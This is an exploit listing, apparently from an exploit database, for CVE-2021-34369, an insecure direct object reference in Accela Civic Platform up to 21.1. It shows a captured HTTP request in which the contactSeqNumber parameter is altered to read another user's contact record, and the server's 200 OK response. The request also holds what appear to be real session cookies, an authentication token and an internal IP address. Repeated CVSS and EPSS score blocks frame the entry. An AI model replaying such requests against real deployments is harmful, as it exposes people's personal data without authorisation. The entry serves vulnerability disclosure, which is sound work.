CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
76.5%
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369
================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
================================================================
Request Heeaders start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Heeaders end
================================================================
contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
76.5%